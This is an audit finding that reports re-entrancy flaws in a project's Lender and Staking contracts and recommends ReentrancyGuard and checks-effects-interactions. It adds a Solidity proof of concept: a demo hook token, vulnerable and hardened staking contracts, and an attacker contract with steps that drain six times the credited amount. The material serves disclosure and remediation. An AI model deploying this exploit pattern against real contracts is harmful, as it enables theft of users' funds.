Submission Details
Severity: high

Re-entrancy

Summary

The Lender and Staking contracts update state variables after making external token-transfer calls. This violates the checks-effects-interactions pattern and exposes both contracts to re-entrancy; state should be updated before any external call.

Vulnerability Details

Several functions in the Lender contract write state variables only after calling an external token contract to transfer funds. If the token hands control back to the caller during the transfer (a token with transfer hooks such as ERC777, or a token contract the attacker controls), the attacker can re-enter the function before its state has been updated and act on the stale values. The affected functions are borrow(), buyLoan(), giveLoan(), refinance(), repay(), seizeLoan(), and setPool().

In the Staking contract, claim() transfers tokens to the caller and only afterwards updates the caller's balance state variable. A caller that is re-entered during the transfer can call claim() again while the balance is still non-zero and withdraw the same amount repeatedly, draining the contract's tokens.

Impact

All funds held by the affected contracts can be drained by an attacker who can re-enter during a token transfer.

Tools Used

Manual Review

Recommendations

To mitigate this vulnerability, apply OpenZeppelin's ReentrancyGuard (the nonReentrant modifier) to the affected functions in both contracts, and follow the checks-effects-interactions pattern: update the balance and any other state variables before making the external transfer call, never after.
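The following is an added example illustrating the claim() pattern described above and the recommended fix; it is not the Staking or Lender code from the audited project. The token (HookToken), the hook interface (IReceiverHook), the staking contracts and the Reentrant attacker are all constructed for this demonstration, and the OpenZeppelin import path assumes Contracts 4.x (5.x moved ReentrancyGuard under utils/). A plain ERC20 transfer makes no callback, so the re-entry needs a token that does, or one the attacker deploys.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

// Assumes OpenZeppelin Contracts 4.x (in 5.x the guard lives under utils/).
import "@openzeppelin/contracts/security/ReentrancyGuard.sol";

// Hypothetical token interface: transfer() calls back into a contract recipient.
interface IHookToken {
    function transfer(address to, uint256 amount) external returns (bool);
}

// Hypothetical recipient hook, modelled on ERC777-style receive hooks.
interface IReceiverHook {
    function onTokenReceived(address from, uint256 amount) external;
}

// Constructed demo token: mint() is open so the scenario can be set up.
contract HookToken is IHookToken {
    mapping(address => uint256) public balanceOf;

    function mint(address to, uint256 amount) external {
        balanceOf[to] += amount;
    }

    function transfer(address to, uint256 amount) external returns (bool) {
        balanceOf[msg.sender] -= amount; // reverts on underflow (0.8 checked math)
        balanceOf[to] += amount;
        if (to.code.length > 0) {
            // Hands control to the recipient before transfer() returns.
            IReceiverHook(to).onTokenReceived(msg.sender, amount);
        }
        return true;
    }
}

// The vulnerable shape reported above: interaction before effect.
contract VulnerableStaking {
    IHookToken public immutable token;
    mapping(address => uint256) public claimable;

    constructor(IHookToken t) { token = t; }

    // Demo-only: a real contract would derive rewards from stake.
    function credit(address user, uint256 amount) external {
        claimable[user] += amount;
    }

    function claim() external {
        uint256 amount = claimable[msg.sender];
        require(amount > 0, "nothing to claim");
        token.transfer(msg.sender, amount); // external call first ...
        claimable[msg.sender] = 0;          // ... state cleared only afterwards
    }
}

// Hardened shape: effects before interactions, plus the guard as a second line of defence.
contract HardenedStaking is ReentrancyGuard {
    IHookToken public immutable token;
    mapping(address => uint256) public claimable;

    constructor(IHookToken t) { token = t; }

    function credit(address user, uint256 amount) external {
        claimable[user] += amount;
    }

    function claim() external nonReentrant {
        uint256 amount = claimable[msg.sender];
        require(amount > 0, "nothing to claim");
        claimable[msg.sender] = 0;                                  // zero the balance first
        require(token.transfer(msg.sender, amount), "transfer failed");
    }
}

// Attacker: re-enters claim() from the token hook while claimable is still set.
contract Reentrant is IReceiverHook {
    VulnerableStaking public immutable target;
    uint256 public rounds;

    constructor(VulnerableStaking t) { target = t; }

    function attack() external { target.claim(); }

    function onTokenReceived(address, uint256) external {
        require(msg.sender == address(target.token()), "unexpected caller");
        // Bounded so the staking contract's token balance is not exhausted,
        // which would revert the whole call chain.
        if (rounds < 5) {
            rounds++;
            target.claim(); // succeeds: claimable[attacker] has not been zeroed yet
        }
    }
}
```

To reproduce: deploy HookToken and VulnerableStaking, mint 6 × N tokens to the staking contract, credit the Reentrant contract with N, and call attack(). Each nested claim() sees the original claimable amount, so the attacker ends with 6 × N tokens from a single credit of N. Against HardenedStaking the nested claim() reverts at the nonReentrant check (and, even without the guard, at the require on the already-zeroed balance); the revert propagates up through transfer(), so the entire attack transaction fails.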
